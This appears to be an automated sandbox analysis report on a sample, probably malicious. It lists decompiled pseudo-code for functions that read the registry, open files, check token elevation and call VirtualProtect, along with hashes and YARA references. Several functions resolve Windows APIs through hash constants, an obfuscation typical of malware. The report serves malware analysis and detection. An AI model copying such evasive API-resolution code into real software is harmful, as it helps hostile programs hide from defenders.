Instruction Fuzzy Hash: 3921AB706082027EEB05EE29CC19FAF7AE9AFD1600F10C82DB585DA291EF34DC09D765

Uniqueness

Uniqueness Score: -1.00%

Function 70575720, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E70575720(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E70572F8C(0xd0443458, 0x91134e46) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E7056F8C4(_a8, _t15);
							if(E70572F8C(0xd0443458, 0x91134e46) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E7056F558(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x70575724
0x70575725
0x70575727
0x7057572c
0x70575733
0x70575737
0x70575737
0x70575737
0x7057573b
0x70575781
0x70575781
0x7057573d
0x7057573d
0x70575743
0x7057574c
0x7057574f
0x70575766
0x70575777
0x70575777
0x70575779
0x7057577f
0x7057578a
0x705757a2
0x705757c2
0x705757c2
0x705757c4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x70575743
0x705757cc

APIs

RegQueryValueExA.KERNELBASE(?,7057D1F8,00000000,?,00000000,00000000,?,?,?,7057D1F8,?,705757F3,?,00000000,00000000), ref: 70575777
RegQueryValueExA.KERNELBASE(?,7057D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,7057D1F8,?,705757F3,?,00000000), ref: 705757C2

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction ID: 0360bdcc515189b4e51a9fb002d4cc9bbd1b8ae260435962f3d9e0f68ee7cca6
Opcode Fuzzy Hash: cdff03e19aa9d02ca93ff40d7f69fa03f4eaa6943e7be9b0135aaa3fabe45ce6
Instruction Fuzzy Hash: 7511B471608305FFE6199E25DC81E6FBFEDDF81794F00981DB58597140DAA0FC00A661

Uniqueness

Uniqueness Score: -1.00%

Function 70575AA8, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E70575AA8(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t21;
				void* _t24;
				void* _t29;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t56;
				WCHAR** _t58;
				char* _t64;
				void* _t65;
				long _t66;

				_push(0);
				_push(_t62);
				_t66 = _t65 - 0x10;
				_t58 = __ecx;
				_t37 = _a8;
				if(E7056D288(__ecx, 0x2f) != 0) {
					_t62 = _t66;
					E7056D78C(__ecx, _t66);
					E7056D0B4(_t58,  *_t66);
					E7056D098(_t66);
				}
				if(_t37 == 0) {
					_t70 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E7057621C(_t70);
				if(_a4 <= 5) {
					goto __eax;
				}
				_t62 = 0;
				if(_t37 != 2) {
					_t16 = 3;
					__eflags = _t37 - 1;
					_t38 = 0;
					_t39 =  ==  ? _t16 : _t38;
				} else {
					_t39 = 1;
				}
				if(E70572F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t29 = CreateFileW( *_t58, 0, _t39, 0, _t62, _a12, 0); // executed
					_push(_t29);
				}
				_t40 =  &(_t58[3]);
				E7056C328(_t40);
				if(E7056C33C(_t40) != 0) {
					_t58[2] = E7057352C(0);
					_t21 = 0;
					goto L19;
				} else {
					if(_a4 == 2) {
						_t56 = E70572F8C(0x4bcc7cba, 0xceed09cc);
						__eflags = _t56;
						if(_t56 != 0) {
							 *_t56( *_t40, 0, 0, 2);
						}
					}
					_t64 =  &_v24;
					E705735D4(_t64, 0xff, 8);
					_t66 = _t66 + 0xc;
					_t24 = E70572F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t24 == 0) {
						_t21 = 1;
						__eflags = 1;
						L19:
						return _t21;
					} else {
						_push(_t64);
						_push(_t64);
						_push(0);
						_push( *_t40);
						asm("int3");
						return _t24;
					}
				}
			}

0x70575aa8
0x70575aab
0x70575aac
0x70575aaf
0x70575ab1
0x70575abe
0x70575ac2
0x70575ac6
0x70575ad0
0x70575ad7
0x70575ad7
0x70575ade
0x70575ae0
0x70575ae5
0x70575aee
0x70575af6
0x70575af6
0x70575ae7
0x70575ae9
0x70575ae9
0x70575ae5
0x70575afb
0x70575b07
0x70575b1d
0x70575b1d
0x70575c38
0x70575b75
0x70575b7e
0x70575b7f
0x70575b84
0x70575b85
0x70575b77
0x70575b79
0x70575b79
0x70575b9b
0x70575baf
0x70575b9d
0x70575baa
0x70575bac
0x70575bac
0x70575bb1
0x70575bb6
0x70575bc4
0x70575c2f
0x70575c32
0x00000000
0x70575bc6
0x70575bcb
0x70575c18
0x70575c1a
0x70575c1c
0x70575c26
0x70575c26
0x70575c1c
0x70575bcd
0x70575bd9
0x70575bde
0x70575beb
0x70575bf2
0x70575bfe
0x70575bfe
0x70575bff
0x70575c06
0x70575bf4
0x70575bf4
0x70575bf5
0x70575bf6
0x70575bf8
0x70575bfa
0x70575bfb
0x70575bfb
0x70575bf2

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e462220cd1f67b16e3770597702d9eea3825a5ce1d0e06a329328f0465b9aa03
Instruction ID: 4c91aba7b940267a41b34b974f337e8043dfa1b7cb6976a4adbc74dafc801020
Opcode Fuzzy Hash: e462220cd1f67b16e3770597702d9eea3825a5ce1d0e06a329328f0465b9aa03
Instruction Fuzzy Hash: 5C3108703443066ED7512E708C8AF3F7EAEDBC1714F10DD3EF94796181DA91AC14A261

Uniqueness

Uniqueness Score: -1.00%

Function 03152439, Relevance: 1.6, APIs: 1, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 03152508

Memory Dump Source

Source File: 00000003.00000002.491898377.0000000003150000.00000040.00000001.sdmp, Offset: 03150000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0577fef0944dd3326ed2e9913e61f8829135af2319b5b22f4240c657147c23ad
Instruction ID: 265342fa81dcd03420394a08c9bd1ed62cd6dafca95e1e4fb27356cc20e5ac46
Opcode Fuzzy Hash: 0577fef0944dd3326ed2e9913e61f8829135af2319b5b22f4240c657147c23ad
Instruction Fuzzy Hash: 6531D8B6E00228CFDB14CF69C98069DF7F1BF88200F568699D958A7305D731AE82CF81

Uniqueness

Uniqueness Score: -1.00%

Function 70575B51, Relevance: 1.6, APIs: 1, Instructions: 63
fileCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E70575B51(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E70572F8C(0x4bcc7cba, 0x80c50a91) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E7056C328(_t24);
					if(E7056C33C(_t24) != 0) {
						_t33[2] = E7057352C(0x80000000);
						_t12 = 0;
						goto L14;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E70572F8C(0x4bcc7cba, 0xceed09cc);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E705735D4(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						_t15 = E70572F8C(0x4bcc7cba, 0xaaa9bb);
						if(_t15 == 0) {
							_t12 = 1;
							goto L14;
						} else {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							return _t15;
						}
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
					L14:
					return _t12;
				}
			}

0x70575b51
0x70575b53
0x70575b6a
0x70575b75
0x70575b7e
0x70575b84
0x70575b85
0x70575b77
0x70575b79
0x70575b79
0x70575b9b
0x70575baf
0x70575b9d
0x70575baa
0x70575bac
0x70575bac
0x70575bb1
0x70575bb6
0x70575bc4
0x70575c2f
0x70575c32
0x00000000
0x70575bc6
0x70575bcb
0x70575c18
0x70575c1c
0x70575c26
0x70575c26
0x70575c1c
0x70575bcd
0x70575bd9
0x70575bde
0x70575beb
0x70575bf2
0x70575bfe
0x00000000
0x70575bf4
0x70575bf4
0x70575bf5
0x70575bf6
0x70575bf8
0x70575bfa
0x70575bfb
0x70575bfb
0x70575bf2
0x70575b55
0x70575b55
0x70575b5c
0x70575bff
0x70575c06
0x70575c06

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70575BAA

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction ID: ba0d983e54fde47d6364e1f46c7db22e9e33607361af30bcf2cf3f2dc89adf2f
Opcode Fuzzy Hash: 26c16dd84db9d2095020c93a0a859f32a102ea0508fef39e3b0ec55714086586
Instruction Fuzzy Hash: 8201F935380306BEE7112E208C86F3F7F6EDBC1350F10EC6AF84B56085DF926818A161

Uniqueness

Uniqueness Score: -1.00%

Function 70575B29, Relevance: 1.6, APIs: 1, Instructions: 57
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E70575B29(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E70572F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7056C328(_t24);
				if(E7056C33C(_t24) != 0) {
					_t34[2] = E7057352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E70572F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E705735D4(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					_t15 = E70572F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x70575b29
0x70575b2d
0x70575b30
0x70575b33
0x70575b75
0x70575b7e
0x70575b84
0x70575b85
0x70575b77
0x70575b79
0x70575b79
0x70575b9b
0x70575baf
0x70575b9d
0x70575baa
0x70575bac
0x70575bac
0x70575bb1
0x70575bb6
0x70575bc4
0x70575c2f
0x70575c32
0x00000000
0x70575bc6
0x70575bcb
0x70575c18
0x70575c1c
0x70575c26
0x70575c26
0x70575c1c
0x70575bcd
0x70575bd9
0x70575bde
0x70575beb
0x70575bf2
0x70575bfe
0x70575bff
0x70575c06
0x70575bf4
0x70575bf4
0x70575bf5
0x70575bf6
0x70575bf8
0x70575bfa
0x70575bfb
0x70575bfb
0x70575bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70575BAA

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction ID: c3b2da1e9d7efd74288bb6d61cd8eea2da44829238da60f039787a804af1d8f3
Opcode Fuzzy Hash: 0fa86986c89fdfff574c3ac8d82252a53ce624ce43e07f87df1cda0750746311
Instruction Fuzzy Hash: BF01A730380306BEEB112E108C46F3F7E6EDFC2754F15EC6AB94B66085DF916C44A121

Uniqueness

Uniqueness Score: -1.00%

Function 70575B3D, Relevance: 1.6, APIs: 1, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E70575B3D(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t15;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t33;
				WCHAR** _t34;
				long _t38;
				void* _t40;
				void* _t41;

				_t34 = __edi;
				_t38 = 2;
				asm("adc ebp, 0x0");
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E70572F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t38, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E7056C328(_t24);
				if(E7056C33C(_t24) != 0) {
					_t34[2] = E7057352C(0xc0000000);
					_t12 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t41 + 0x24)) == 2) {
						_t33 = E70572F8C(0x4bcc7cba, 0xceed09cc);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t40 = _t41 + 8;
					E705735D4(_t40, 0xff, 8);
					_t41 = _t41 + 0xc;
					_t15 = E70572F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t15 == 0) {
						_t12 = 1;
						L12:
						return _t12;
					} else {
						_push(_t40);
						_push(_t40);
						_push(0);
						_push( *_t24);
						asm("int3");
						return _t15;
					}
				}
			}

0x70575b3d
0x70575b44
0x70575b47
0x70575b75
0x70575b7e
0x70575b84
0x70575b85
0x70575b77
0x70575b79
0x70575b79
0x70575b9b
0x70575baf
0x70575b9d
0x70575baa
0x70575bac
0x70575bac
0x70575bb1
0x70575bb6
0x70575bc4
0x70575c2f
0x70575c32
0x00000000
0x70575bc6
0x70575bcb
0x70575c18
0x70575c1c
0x70575c26
0x70575c26
0x70575c1c
0x70575bcd
0x70575bd9
0x70575bde
0x70575beb
0x70575bf2
0x70575bfe
0x70575bff
0x70575c06
0x70575bf4
0x70575bf4
0x70575bf5
0x70575bf6
0x70575bf8
0x70575bfa
0x70575bfb
0x70575bfb
0x70575bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70575BAA

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction ID: 094f472420cfa7df9771a3d1e17e4991159d1ad257befa6a57cc77fb82f8af39
Opcode Fuzzy Hash: 5b8d02cd4674f4ed770eb1c7c80a412027ed08d7cd8f65890b2514b95d1dd015
Instruction Fuzzy Hash: A501A7243403167EE7112E218C86F3F7E6EDBC2754F14EC6AB94B66085DEA16C54A161

Uniqueness

Uniqueness Score: -1.00%

Function 70575B1F, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E70575B1F(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E70572F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0x100, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7056C328(_t23);
				if(E7056C33C(_t23) != 0) {
					_t31[2] = E7057352C(0x100);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E70572F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E705735D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E70572F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x70575b1f
0x70575b26
0x70575b75
0x70575b7e
0x70575b84
0x70575b85
0x70575b77
0x70575b79
0x70575b79
0x70575b9b
0x70575baf
0x70575b9d
0x70575baa
0x70575bac
0x70575bac
0x70575bb1
0x70575bb6
0x70575bc4
0x70575c2f
0x70575c32
0x00000000
0x70575bc6
0x70575bcb
0x70575c18
0x70575c1c
0x70575c26
0x70575c26
0x70575c1c
0x70575bcd
0x70575bd9
0x70575bde
0x70575beb
0x70575bf2
0x70575bfe
0x70575bff
0x70575c06
0x70575bf4
0x70575bf4
0x70575bf5
0x70575bf6
0x70575bf8
0x70575bfa
0x70575bfb
0x70575bfb
0x70575bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70575BAA

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction ID: 467b4ff2aed09818d49f4058a39d52289cadae28119802241032e32dc99d9ff1
Opcode Fuzzy Hash: c230670b004b2ad28e76934f353d99ed69517ec83133175e69b5ed079cd00cba
Instruction Fuzzy Hash: 01018630380316BEEB122E208C86F3F7E6EDBC2754F10EC6AB94B65085DF916954A161

Uniqueness

Uniqueness Score: -1.00%

Function 70575B6D, Relevance: 1.6, APIs: 1, Instructions: 51
fileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E70575B6D(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t14;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E70572F8C(0x4bcc7cba, 0x80c50a91) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E7056C328(_t23);
				if(E7056C33C(_t23) != 0) {
					_t31[2] = E7057352C(0);
					_t11 = 0;
					goto L12;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E70572F8C(0x4bcc7cba, 0xceed09cc);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E705735D4(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					_t14 = E70572F8C(0x4bcc7cba, 0xaaa9bb);
					if(_t14 == 0) {
						_t11 = 1;
						L12:
						return _t11;
					} else {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						return _t14;
					}
				}
			}

0x70575b6d
0x70575b71
0x70575b75
0x70575b7e
0x70575b84
0x70575b85
0x70575b77
0x70575b79
0x70575b79
0x70575b9b
0x70575baf
0x70575b9d
0x70575baa
0x70575bac
0x70575bac
0x70575bb1
0x70575bb6
0x70575bc4
0x70575c2f
0x70575c32
0x00000000
0x70575bc6
0x70575bcb
0x70575c18
0x70575c1c
0x70575c26
0x70575c26
0x70575c1c
0x70575bcd
0x70575bd9
0x70575bde
0x70575beb
0x70575bf2
0x70575bfe
0x70575bff
0x70575c06
0x70575bf4
0x70575bf4
0x70575bf5
0x70575bf6
0x70575bf8
0x70575bfa
0x70575bfb
0x70575bfb
0x70575bf2

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,4BCC7CBA,80C50A91), ref: 70575BAA

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction ID: 2ed4e57b780accddf8fc8f073fbcf41ea8ed75eedb30a337d929926b9bf67066
Opcode Fuzzy Hash: f41fd778113157c199e1483cbf3e3356fcc1afe5b5c32d8304a410e71b511c74
Instruction Fuzzy Hash: 31F0A9343803177EE7111E118C86F3F7E6EDBC2754F10EC6AB94B65085DF916914A171

Uniqueness

Uniqueness Score: -1.00%

Function 70575D7C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E70575D7C(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E7056C33C(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E70572F8C(0x4bcc7cba, 0xceed09cc) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x70575d80
0x70575d81
0x70575d83
0x70575d89
0x70575d8b
0x70575d8f
0x70575d8f
0x70575d93
0x70575d9f
0x70575dd3
0x70575dd3
0x00000000
0x70575da1
0x70575da6
0x70575da7
0x70575dbb
0x70575dcc
0x70575dbd
0x70575dc8
0x70575dc8
0x70575dd1
0x70575dd9
0x70575ddb
0x70575dde
0x70575de3
0x70575de3
0x70575de7
0x70575dec
0x00000000
0x00000000
0x00000000
0x70575dd1

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,CEED09CC,?,?,00000000,00000000,?,70575CB4,?,?), ref: 70575DC8

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493612191.000000007057A000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.493658694.000000007057D000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.493670967.000000007057F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction ID: 3779b374190d4941e8264a0e99e2b533b56c994f84088eaad59cb1fa30d3005a
Opcode Fuzzy Hash: 7634ac0c9d3648873fd736d4ea4b19d370915cdf3bd7e6405098399fd11748dd
Instruction Fuzzy Hash: D2F0F931A057616DD3615E389C44B9F7FF5DFD5710F209F2EF582A6144E7A099406190

Uniqueness

Uniqueness Score: -1.00%

Function 705710CC, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E705710CC(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E70572F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E70572F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0xd0443454
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x705710da
0x705710dc
0x705710ea
0x705710ee
0x70571137
0x00000000
0x70571137
0x705710f3
0x705710f4
0x705710f6
0x705710fb
0x00000000
0x70571114
0x70571118
0x70571125
0x70571129
0x00000000
0x00000000
0x00000000
0x70571132

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,D0443454,00000004,D0443458,D0443458,D0443458), ref: 70571125

Memory Dump Source

Source File: 00000003.00000002.493524279.0000000070561000.00000020.00020000.sdmp, Offset: 70560000, based on PE: true

Associated: 00000003.00000002.493499651.0000000070560000.00000002.00020000.sdmp Download File
